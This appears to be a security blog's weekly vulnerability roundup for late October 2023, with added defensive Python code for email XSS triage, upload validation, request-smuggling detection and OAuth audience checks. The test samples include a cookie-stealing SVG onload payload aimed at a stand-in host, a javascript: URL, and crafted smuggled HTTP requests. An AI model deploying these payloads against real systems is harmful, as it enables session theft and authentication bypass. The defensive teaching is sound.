Weekly Vulnerability Summary: 7 New Vulnerabilities for the week of October 22, 2023

Every week brings a wide range of new vulnerabilities, some more dangerous than others and some more relevant to your environment than others. In this week's summary we cover a diverse set of issues you should be aware of so you can stay current.

  1. Apple iOS 17.1 Vulnerabilities

    Apple patched numerous vulnerabilities in a wide-sweeping set of updates this week, covering iOS 17.1, iPadOS 17.1, Safari 17.1, watchOS 10.1, tvOS 17.1, and macOS Sonoma 14.1. In iOS 17.1 alone, multiple sensitive information disclosure, arbitrary code execution, denial of service, and authentication bypass vulnerabilities were fixed across numerous apps and components. Apple also released iOS 15.8 for older devices, because several of the vulnerabilities it fixes were being exploited in the espionage campaign known as Operation Triangulation and by its TriangleDB malware.

    We highly recommend updating all your Apple devices to the latest available version to stay secure.

  2. Roundcube Webmail XSS

    Security researchers at ESET reported that the threat group Winter Vivern exploited a new stored XSS vulnerability in Roundcube Webmail. The group had previously exploited a similar, older Roundcube XSS flaw, which shows how persistently attackers keep returning to the same targets. Roundcube servers are deployed in numerous government agencies around the world. The vulnerability is exploited by sending a specially crafted email message: when the recipient opens it in their web browser, the message loads arbitrary JavaScript in the context of the Roundcube session, and no interaction beyond viewing the email is needed.

    This highlights the need to stay vigilant for security patches, since a critical vulnerability can be disclosed at any time. It also shows how relevant malicious email remains as a delivery vector: here the message itself is the exploit, with no link to click or attachment to open.
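    The following is an added triage example for the Roundcube item, not Roundcube's own code or the exploit used by Winter Vivern. It parses a raw .eml message, walks its text/html parts and reports the constructs that a stored-XSS sanitizer bypass turns into code execution in the reader's session: script-bearing elements (including inline SVG), event-handler attributes and javascript: URLs. The sample messages, addresses and hostnames are constructed for the demo.

```python
"""Triage check for HTML e-mail bodies that carry active content.

Added illustration for the Roundcube stored-XSS item; not Roundcube code.
A webmail client has to render HTML from every sender, so a message whose body
contains script, event-handler attributes, javascript: URLs or inline SVG is
exactly the payload that a sanitizer bypass turns into JavaScript running in
the reader's session. The .eml samples below are constructed for the demo.
"""
from email import message_from_bytes, policy
from email.message import EmailMessage
from html.parser import HTMLParser

# Elements that can run or load code, or change how the rest of the page resolves.
ACTIVE_TAGS = {"script", "iframe", "object", "embed", "svg", "math", "base", "meta", "link"}
# Attributes whose value is a URL and may therefore carry a javascript: scheme.
URL_ATTRS = {"href", "src", "action", "formaction", "xlink:href", "data"}


class ActiveContentFinder(HTMLParser):
    """Collects a human-readable finding for every risky construct seen."""

    def __init__(self) -> None:
        # convert_charrefs decodes entity-encoded data; attribute values are
        # always unescaped by HTMLParser, so "&#106;avascript:" is seen as-is.
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag in ACTIVE_TAGS:
            self.findings.append(f"<{tag}> element")
        for name, value in attrs:  # HTMLParser lowercases tag and attribute names
            value = value or ""
            if name.startswith("on"):
                self.findings.append(f"event handler {name}= on <{tag}>")
            elif name in URL_ATTRS:
                # Remove embedded whitespace so "java\tscript:" is normalised before the check.
                scheme = "".join(value.split()).lower().partition(":")[0]
                if scheme in ("javascript", "vbscript") or (scheme == "data" and tag != "img"):
                    self.findings.append(f"{scheme}: URL in {name}= on <{tag}>")


def scan_html(html: str) -> list:
    """Return findings for one HTML document."""
    finder = ActiveContentFinder()
    finder.feed(html)
    finder.close()
    return finder.findings


def scan_eml(raw: bytes) -> list:
    """Parse a raw RFC 5322 message and scan every text/html part it contains."""
    msg = message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            findings.extend(scan_html(part.get_content()))
    return findings


def build_sample(html_body: str) -> bytes:
    """Constructed multipart/alternative message used only to exercise scan_eml."""
    msg = EmailMessage()
    msg["From"] = "billing@sender.example"
    msg["To"] = "user@webmail.example"
    msg["Subject"] = "Invoice"
    msg.set_content("Plain-text fallback")
    msg.add_alternative(html_body, subtype="html")
    return msg.as_bytes()


BENIGN_HTML = '<html><body><p>Invoice attached.</p><img src="cid:logo" alt="logo"></body></html>'
MALICIOUS_HTML = (
    "<html><body><p>Invoice attached.</p>"
    "<svg onload=\"fetch('https://collector.example/?c='+document.cookie)\"></svg>"
    '<a href="JaVaScRiPt:alert(document.domain)">View invoice</a>'
    "</body></html>"
)

if __name__ == "__main__":
    for label, body in (("benign", BENIGN_HTML), ("malicious", MALICIOUS_HTML)):
        print(label, scan_eml(build_sample(body)) or "clean")
```

    Run over a mailbox export, this gives an incident responder a quick list of messages worth a closer look after a webmail XSS disclosure; the same allowlist logic, applied at render time, is what a sanitizer has to get right.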

  3. PHPFusion Vulnerabilities

    PHPFusion is an open-source content management system (CMS) used by over 15 million sites worldwide. CVE-2023-2453 allows remote code execution by uploading a specially crafted .php file to the target system, and it can be combined with an arbitrary file read and write vulnerability, CVE-2023-4480. To exploit these vulnerabilities, an attacker needs an account of any privilege level, knowledge of the vulnerable endpoint, and the ability to upload PHP files. Once exploited, the attacker gains the privileges of the compromised account, up to and including administrator.
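    As an added example for this item (generic hardening code, not PHPFusion's own upload handler), the validator below shows the checks that stop the "upload a .php file, then request it" chain: the client-supplied name and type are never trusted, any executable extension anywhere in the name is fatal, the content must match the magic bytes of the declared image type, and the stored name is random. The payload bytes and file names used to exercise it are constructed.

```python
"""Server-side validation for user file uploads.

Added illustration for the PHPFusion item: an RCE that works by getting a .php
file onto the web server is stopped by never trusting the client's file name or
type. Generic example code, not PHPFusion's upload handler; sample payloads are
constructed.
"""
import os
import secrets

# Extensions the application actually needs; everything else is rejected.
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif"}
# Extensions a PHP-enabled web server may execute. Rejected wherever they appear
# in the name, so "avatar.php.png" and "avatar.phtml" both fail.
EXECUTABLE_EXTENSIONS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "phps", "inc", "htaccess"}
# Leading bytes each allowed type must start with; the extension alone proves nothing.
MAGIC = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}


class UploadRejected(ValueError):
    """Raised with a reason the server can log; the client should get a generic error."""


def validate_upload(client_name: str, content: bytes, max_bytes: int = 2 * 1024 * 1024) -> str:
    """Return a random server-side file name if the upload is acceptable.

    The returned name carries only the verified extension, so the original name
    never reaches the filesystem. Store the file outside the web root as well.
    """
    if len(content) > max_bytes:
        raise UploadRejected("file too large")
    # Drop any directory component the client sent (../ sequences or absolute paths).
    base = os.path.basename(client_name.replace("\\", "/"))
    if not base or base.startswith("."):
        raise UploadRejected("empty or hidden file name")
    parts = base.lower().split(".")
    if len(parts) < 2:
        raise UploadRejected("no file extension")
    # Any dot-separated segment the server could execute is fatal, not just the last one.
    if EXECUTABLE_EXTENSIONS & set(parts[1:]):
        raise UploadRejected("executable extension in file name")
    ext = parts[-1]
    if ext not in ALLOWED_EXTENSIONS:
        raise UploadRejected(f"extension .{ext} not allowed")
    if not content.startswith(MAGIC[ext]):
        raise UploadRejected("content does not match declared type")
    if b"<?php" in content or b"<?=" in content:
        # Polyglot defence: a valid image header with PHP appended is still rejected.
        raise UploadRejected("embedded PHP tag")
    return f"{secrets.token_hex(16)}.{ext}"


def is_rejected(client_name: str, content: bytes) -> bool:
    """Helper for tests and demos: True if validate_upload refuses the file."""
    try:
        validate_upload(client_name, content)
    except UploadRejected:
        return True
    return False


if __name__ == "__main__":
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16  # constructed minimal PNG header
    print("avatar.png ->", validate_upload("avatar.png", png))
    for name in ("shell.php", "avatar.php.png", "../../config.php"):
        print(name, "-> rejected" if is_rejected(name, png) else "-> accepted")
```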

  4. vCenter Critical Vulnerabilities

    VMware just patched two vCenter Server vulnerabilities: a critical remote code execution flaw, CVE-2023-34048, and an information disclosure flaw exploitable by a user with non-administrative privileges, CVE-2023-34056. VMware has released patches for vCenter Server 8.0U1 as well as for the older vCenter Server 6.7U3, 6.5U3 and VCF 3.x releases.

    This follows vulnerabilities disclosed earlier this year in VMware's Aria Operations products: CVE-2023-34051 in its log storage and analysis tool Aria Operations for Logs, and CVE-2023-20887 in Aria Operations for Networks. The proof of concept (PoC) explanation and code can be found here: Summoning Team's Blog.

  5. BIG-IP Unauthenticated RCE

    F5 announced that the BIG-IP Configuration utility allows unauthenticated requests to bypass authentication: CVE-2023-46747. According to F5, the vulnerability may allow an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands. It affects only the control plane; there is no data plane exposure.

    Like many vulnerabilities discussed here before, this one closely resembles a previous finding that F5 disclosed last year; this time the root cause is an HTTP request smuggling vulnerability in the Configuration utility's Apache component.
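    Because the root cause is request smuggling, the added example below (generic code, not F5's fix or the CVE-2023-46747 exploit) shows the header combinations that let a front-end proxy and a back-end server disagree about where one request ends and the next begins. That disagreement is what allows an attacker to hide a second, unauthenticated request inside a first one and have it processed by the layer behind the authentication check. The raw requests, hostnames and paths are constructed; the checks generalize the classic CL.TE/TE.CL cases rather than mirroring BIG-IP's specific Apache-to-back-end path.

```python
"""Flag HTTP/1.1 requests whose framing is ambiguous between two parsers.

Added illustration for the BIG-IP item, whose authentication bypass is rooted in
request smuggling. Generic example code, not F5's patch or the exploit: it lists
the header patterns that let a proxy and an origin server disagree about the
request boundary. Sample requests are constructed.
"""


def parse_request(raw: bytes):
    """Split a raw request into (request_line, [(name, value), ...], body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = []
    for line in lines[1:]:
        if line:
            name, _, value = line.partition(":")
            headers.append((name, value.strip()))  # name kept raw: trailing spaces are evidence
    return lines[0], headers, body


def smuggling_findings(raw: bytes) -> list:
    """Return the reasons this request must not be forwarded as-is (empty if none)."""
    _, headers, body = parse_request(raw)
    findings = []
    content_lengths = []
    transfer_encodings = []
    for name, value in headers:
        canonical = name.strip().lower()
        if name != name.strip():
            # "Transfer-Encoding : chunked" is ignored by strict parsers and honoured by lax ones.
            findings.append(f"whitespace around header name {name!r}")
        if canonical == "content-length":
            content_lengths.append(value)
        elif canonical == "transfer-encoding":
            transfer_encodings.append(value)

    if content_lengths and transfer_encodings:
        findings.append("Content-Length and Transfer-Encoding both present (CL.TE/TE.CL ambiguity)")
    if len(content_lengths) > 1 and len(set(content_lengths)) > 1:
        findings.append("conflicting Content-Length values " + ", ".join(content_lengths))
    if len(transfer_encodings) > 1:
        findings.append("duplicate Transfer-Encoding headers")
    for value in transfer_encodings:
        # Anything other than a plain "chunked" (e.g. "xchunked") is a parser-dependent guess;
        # this example deliberately treats it as suspect.
        if value.lower() != "chunked":
            findings.append(f"non-standard Transfer-Encoding value {value!r}")
    for value in content_lengths:
        if not value.isdigit():
            findings.append(f"non-numeric Content-Length {value!r}")
        elif not transfer_encodings and int(value) != len(body):
            # Extra bytes after the declared body are the start of a smuggled request.
            findings.append(f"Content-Length {value} does not match body of {len(body)} bytes")
    return findings


# Constructed samples (not real traffic to any product).
CLEAN = b"POST /login HTTP/1.1\r\nHost: mgmt.example\r\nContent-Length: 10\r\n\r\nuser=alice"
CL_TE = (
    b"POST /login HTTP/1.1\r\nHost: mgmt.example\r\n"
    b"Content-Length: 13\r\nTransfer-Encoding: chunked\r\n\r\n"
    b"0\r\n\r\nSMUGGLED"
)
OBFUSCATED = (
    b"POST /login HTTP/1.1\r\nHost: mgmt.example\r\n"
    b"Content-Length: 4\r\nTransfer-Encoding : xchunked\r\n\r\nabcd"
)
DOUBLE_CL = (
    b"POST /login HTTP/1.1\r\nHost: mgmt.example\r\n"
    b"Content-Length: 4\r\nContent-Length: 27\r\n\r\n"
    b"abcdGET /admin HTTP/1.1\r\n\r\n"
)

if __name__ == "__main__":
    for label, sample in (("clean", CLEAN), ("cl.te", CL_TE), ("obfuscated", OBFUSCATED), ("double-cl", DOUBLE_CL)):
        print(label, smuggling_findings(sample) or "ok")
```

    A front end that applies this logic and rejects (rather than normalises) ambiguous requests removes the precondition for this whole class of authentication bypass; restricting the management interface to trusted networks, as F5 advises, limits who can even attempt it.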

  6. Open Authorization (OAuth) Sign-in Vulnerabilities

    Issues in Grammarly's implementation of OAuth led to sign-in vulnerabilities. Fortunately no accounts are known to have been compromised, but the same class of OAuth implementation flaw can affect any company. The attack, dubbed "Pass-the-Token", abuses a business logic flaw: an attacker takes a token that the identity provider issued to a user for a different site and submits it to the target's sign-in endpoint, and because sites like Grammarly failed to verify that the token had been issued for their own application, the attacker is signed in as that user.

    Such verification flaws could give an attacker complete access to a user's account on the affected website, exposing bank account information, credit card details and other sensitive data, and allowing the attacker to perform any action on the user's behalf, which can lead to identity theft and fraud.
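    The following added example (not Grammarly's code) shows the missing check in working form. It stands in a deliberately tiny HS256 token format for a real identity provider's tokens: a valid signature only proves the provider authenticated somebody, and only the audience claim (the app_id or client_id the token was issued for) proves it was for this site. `login_vulnerable` accepts any genuine token; `login_hardened` also requires the audience, issuer and expiry to be right. The shared secret, client identifiers, issuer URL and user names are all constructed for the demo.

```python
"""Why a sign-in endpoint must check which application a token was issued to.

Added illustration for the Pass-the-Token item; not Grammarly's code. A tiny
HS256 token format stands in for the identity provider. The point is the same
for OAuth access tokens and OIDC ID tokens: the signature proves the provider
authenticated *someone*, the audience proves it was for *this* site.
Secret, client IDs, issuer and users are constructed.
"""
import base64
import hashlib
import hmac
import json
import time

IDP_SECRET = b"shared-signing-secret-for-demo-only"  # constructed; a real IdP signs with its private key
IDP_ISSUER = "https://idp.example"                    # constructed issuer
OUR_CLIENT_ID = "notes-app"                           # constructed: the relying party being attacked


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def mint_token(claims: dict, secret: bytes = IDP_SECRET) -> str:
    """Identity provider side: sign a set of claims about an authenticated user."""
    header = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    payload = _b64url(json.dumps(claims).encode())
    signature = hmac.new(secret, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{_b64url(signature)}"


def verified_claims(token: str, secret: bytes = IDP_SECRET):
    """Return the claims if the signature is genuine, else None. Checks nothing else."""
    try:
        header, payload, signature = token.split(".")
    except ValueError:
        return None
    expected = hmac.new(secret, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64url_decode(signature)):
        return None
    return json.loads(_b64url_decode(payload))


def login_vulnerable(token: str):
    """The flawed pattern: a genuine signature is treated as proof of identity."""
    claims = verified_claims(token)
    return claims.get("sub") if claims else None


def login_hardened(token: str, now=None):
    """Accept only tokens this issuer minted for this client that are still valid."""
    claims = verified_claims(token)
    if not claims:
        return None
    now = time.time() if now is None else now
    aud = claims.get("aud")
    audiences = aud if isinstance(aud, list) else [aud]
    if OUR_CLIENT_ID not in audiences:  # the Pass-the-Token check: was this token issued to us?
        return None
    if claims.get("iss") != IDP_ISSUER:
        return None
    exp = claims.get("exp")
    if not isinstance(exp, (int, float)) or exp <= now:
        return None
    return claims.get("sub") or None


def pass_the_token_demo(now: float = 1_698_000_000.0) -> dict:
    """Victim signs in to the attacker's app; the attacker replays that token to ours."""
    stolen = mint_token({"iss": IDP_ISSUER, "sub": "victim@mail.example",
                         "aud": "attacker-quiz-app", "exp": now + 3600})
    legit = mint_token({"iss": IDP_ISSUER, "sub": "victim@mail.example",
                        "aud": OUR_CLIENT_ID, "exp": now + 3600})
    return {
        "vulnerable_accepts_stolen": login_vulnerable(stolen),
        "hardened_accepts_stolen": login_hardened(stolen, now),
        "hardened_accepts_legit": login_hardened(legit, now),
    }


if __name__ == "__main__":
    for key, value in pass_the_token_demo().items():
        print(f"{key}: {value}")
```

    With a provider that hands out opaque access tokens rather than signed JWTs, the equivalent of the audience check is the token introspection or debug call that returns which application the token belongs to; skipping that call is exactly the flaw the research describes.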

  7. Cisco IOS XE Zero Day: CVE-2023-20198

    Cisco devices running IOS XE with the HTTP or HTTPS server feature enabled are affected by a new zero-day rated Critical. The vulnerability allows a remote, unauthenticated attacker to create an account with privilege level 15 access, giving full control of the device. Cisco's advisory asks all IOS XE customers to disable the HTTP and HTTPS server features on internet-facing systems while a patch is developed. To determine whether you have been affected, see our blog post on CVE-2023-20198 configurations, forensic artifacts, and IoCs.
